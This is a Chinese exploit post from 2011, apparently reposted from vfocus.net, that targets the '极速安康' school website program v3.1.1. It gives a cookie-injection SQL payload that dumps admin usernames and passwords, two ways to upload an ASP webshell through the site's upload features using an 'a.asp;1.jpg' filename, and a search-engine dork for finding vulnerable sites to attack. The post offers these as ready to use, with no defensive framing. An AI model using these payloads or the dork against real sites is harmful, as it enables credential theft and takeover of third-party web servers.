极速安康学校网站程序 v3.1.1 cookie注入漏洞

		当前位置：主页>安全文章>文章资料>漏洞资料>文章内容

极速安康学校网站程序 v3.1.1 cookie注入漏洞

来源：vfocus.net 作者：Mr.DzY 发布时间：2011-06-23

软件介绍[版权声明] PS:好像是oyaya的内核.
使用本系统注意事项：
　　1，本程序由极速安康开发,象征性的收取一点费用供大家使用！
　　2，本系统为共享程序,用户自由选择是否使用,在使用中出现任何问题而造成的损失极速安康不负任何责任！
　　3，尊重作者劳动成果,希望各位在使用时不要修改版权和制作申明！！！
　　4，此版本为免费版，不提供技术支持
极速安康V3.1.1 演示地址: demo.it0951.com

EXP:
javascript:alert(document.cookie="id="+escape("170 and 1=2 union select

1,admin,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20 from admin"));

get shell两种方法:

1、上传图片，备份。
2.添加文章--浏览---上传a.asp;1.jpg

访问：www.hackqing.com/uppic/201106212254a.asp;1.jpg

关键字:
inurl:type_all.asp?classid=

多的自己找.

By: Mr.DzY

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统致命漏洞。
·南方数据企业网站管理系统V10.0
·动网（DVBBS）Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码，常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day

推荐广告